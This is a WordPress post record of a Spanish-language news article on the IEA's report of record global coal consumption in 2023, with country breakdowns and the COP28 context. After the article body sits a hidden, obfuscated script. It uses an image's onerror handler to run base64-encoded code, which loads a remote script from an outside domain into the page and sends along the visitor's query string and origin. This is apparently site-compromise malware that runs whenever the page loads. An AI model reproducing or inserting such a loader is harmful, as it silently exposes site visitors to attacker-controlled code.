{"id":7769,"date":"2024-01-05T11:34:59","date_gmt":"2024-01-05T14:34:59","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7769"},"modified":"2025-08-13T15:49:07","modified_gmt":"2025-08-13T18:49:07","slug":"el-consumo-mundial-de-carbon-batio-records-en-2023","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7769","title":{"rendered":"El consumo mundial de carb\u00f3n bati\u00f3 r\u00e9cords en 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-black-background-color has-text-color has-background has-link-color wp-elements-b3ca8686acf9b6476c324271044e9486\"><em>Se quemaron 8.530 millones de toneladas de este combustible f\u00f3sil, seg\u00fan la Agencia Internacional de la Energ\u00eda. La COP28 marc\u00f3 la ruta a una \u00abtransici\u00f3n\u00bb para el abandono progresivo de este tipo de energ\u00edas.<\/em><\/h4>\n\n\n\n<p>El consumo de carb\u00f3n en el mundo<strong>&nbsp;alcanz\u00f3 un r\u00e9cord este a\u00f1o, despu\u00e9s de que se quemaran 8.530 millones de toneladas de este combustible f\u00f3sil<\/strong>, seg\u00fan inform\u00f3 la Agencia Internacional de la Energ\u00eda (AIE), apenas dos d\u00edas despu\u00e9s del cierre de la COP28, que marc\u00f3 la ruta a una \u00abtransici\u00f3n\u00bb para el abandono progresivo de este tipo de energ\u00edas.<\/p>\n\n\n\n<p>A pesar de que los pa\u00edses participantes en la conferencia del clima de la ONU en Dubai se comprometieron a un abandono progresivo de las energ\u00edas f\u00f3siles, este a\u00f1o se bati\u00f3 el r\u00e9cord que ya se hab\u00eda registrado en 2022, seg\u00fan el informe de la AIE.<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-text-align-center\"><em><mark class=\"has-inline-color has-vivid-green-cyan-color\">La combusti\u00f3n de carb\u00f3n es responsable de buena parte de las emisiones de di\u00f3xido de carbono<\/mark><\/em><\/h4>\n\n\n\n<p>Estas cifras coinciden<strong>&nbsp;en que este a\u00f1o \u00abcon casi toda certeza\u00bb superar\u00e1 el 2016 como el m\u00e1s c\u00e1lido<\/strong>, alert\u00f3 el observatorio europeo Copernicus a principios de noviembre, rese\u00f1\u00f3 la agencia de noticias AFP.<\/p>\n\n\n\n<p>La combusti\u00f3n de carb\u00f3n, tanto para producir energ\u00eda como para hacer funcionar la industria, es responsable de buena parte de las emisiones de di\u00f3xido de carbono (CO2).<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/657af5ea07daa_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><br><sup>Seg\u00fan los expertos, este a\u00f1o superar\u00e1 a 2016 como el m\u00e1s c\u00e1lido de la historia \/ Foto: Archivo.<\/sup><\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">Con China a la cabeza<\/h2>\n\n\n\n<p>La AIE destac\u00f3&nbsp;<strong>la tendencia al alza de su consumo en China<\/strong>, donde aument\u00f3 en 220 millones de toneladas (4,9%) respecto del a\u00f1o pasado, y en India, con un incremento de 98 millones (8%).<\/p>\n\n\n\n<p>Tambi\u00e9n se quemaron 23 millones de toneladas m\u00e1s en Indonesia, lo que represent\u00f3 un aumento de 11%, seg\u00fan el informe. En cambio, su uso&nbsp;<strong>disminuy\u00f3 de manera significativa en Europa<\/strong>, con 107 millones de toneladas menos (-23%), y en Estados Unidos, con una reducci\u00f3n de 95 millones de toneladas (-21%).<\/p>\n\n\n\n<p>El cierre de las centrales de carb\u00f3n y el menor peso de la industria favorecieron esa tendencia en ambos lugares. En Alemania, por ejemplo, la mayor\u00eda de las centrales deber\u00edan cerrar durante los tres pr\u00f3ximos a\u00f1os y ser sustituidas por plantas e\u00f3licas o solares.<\/p>\n\n\n\n<p>Francia quiere cerrar su \u00faltima central el\u00e9ctrica alimentada con carb\u00f3n \u00aben 2027\u00bb.<\/p>\n\n\n\n<p>La AIE reconoce&nbsp;<strong>la dificultad de hacer previsiones certeras sobre Rusia<\/strong>, cuarto consumidor mundial de carb\u00f3n, debido a la guerra de Ucrania.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">UN PICO DE CONSUMO<\/h3>\n\n\n\n<p><strong><em><mark style=\"color:#7a7d7f\" class=\"has-inline-color\">Los niveles de 2023\u00a0representar\u00e1n \u00abun pico\u00bb en el consumo de carb\u00f3n, que disminuir\u00e1 \u00aba partir de 2024\u00bb, seg\u00fan esta agencia internacional, fundada en 1974 en el seno de la Organizaci\u00f3n de Cooperaci\u00f3n y Desarrollo Econ\u00f3micos (OCDE).<br><br>La AIE cuenta con\u00a0un aumento de las energ\u00edas renovables en todo el planeta\u00a0para \u00abllevar el consumo mundial de carb\u00f3n hacia una trayectoria descendente\u00bb.\u00a0A pesar de ello, no se prev\u00e9 una reducci\u00f3n de su uso en la industria par el futuro inmediato.<\/mark><\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202312\/649611-cambio-climatico-carbon.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se quemaron 8.530 millones de toneladas de este combustible f\u00f3sil, seg\u00fan la Agencia Internacional de la Energ\u00eda. La COP28 marc\u00f3 la ruta a una \u00abtransici\u00f3n\u00bb para el abandono progresivo de este tipo de energ\u00edas. El consumo de carb\u00f3n en el mundo&nbsp;alcanz\u00f3 un r\u00e9cord este a\u00f1o, despu\u00e9s de que se quemaran 8.530 millones de toneladas de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7770,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-7769","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7769","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7769"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7769\/revisions"}],"predecessor-version":[{"id":10240,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7769\/revisions\/10240"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7770"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7769"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7769"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7769"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}